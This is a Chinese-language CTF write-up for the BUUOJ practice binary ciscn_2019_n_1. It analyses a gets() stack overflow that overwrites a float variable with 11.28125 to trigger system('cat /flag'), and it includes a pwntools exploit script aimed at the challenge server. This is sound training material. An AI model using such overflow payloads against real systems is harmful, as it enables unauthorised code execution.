解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:[[Stack溢出覆盖内存]]
- libc地址:无需
- BSS段地址:无需
劫持程序执行流程:
获得shell或flag:[[调用程序中的system]]
学到的知识:
[[双精度浮点数存储]]
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file ciscn_2019_n_1
ciscn_2019_n_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8a733f5404b1e2c65e1758c7d92821eb8490f7c5, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=ciscn_2019_n_1
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 73) Symbols No 0 1ciscn_2019_n_1
libc版本:
wp借鉴:
核心伪代码分析:
存在利用的的代码:
int func()
{
char v1[44]; // [rsp+0h] [rbp-30h] BYREF
float v2; // [rsp+2Ch] [rbp-4h]
v2 = 0.0;
puts("Let's guess the number.");
gets(v1);
if ( v2 == 11.28125 )
return system("cat /flag");
else
return puts("Its value should be 11.28125");
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
func();
return 0;
}
分析:
利用栈溢出覆盖v2改变其值,获得flag。
要将V2变为11.28125,必须知道11.28125的十六进制表示形式
.rodata:00000000004007D6 ; DATA XREF: func:loc_4006CF↑o
.rodata:00000000004007F3 align 4
.rodata:00000000004007F4 dword_4007F4 dd 41348000h ; DATA XREF: func+31↑r
.rodata:00000000004007F4 ; func+3F↑r
在rodate段,可以找到11.28125的十六进制表示形式为0x41348000h
-0000000000000030 var_30 db 44 dup(?)
-0000000000000004 var_4 dd ?
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
脚本:
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
pwnfile='./ciscn_2019_n_1'
sh=remote('node4.buuoj.cn',26981)
#sh=process(pwnfile)
payload=(0x30-4)*b'a'+p64(0x41348000)
sh.recvuntil("Let's guess the number.")
#gdb.attach(sh)
#pause()
sh.sendline(payload)
sh.interactive()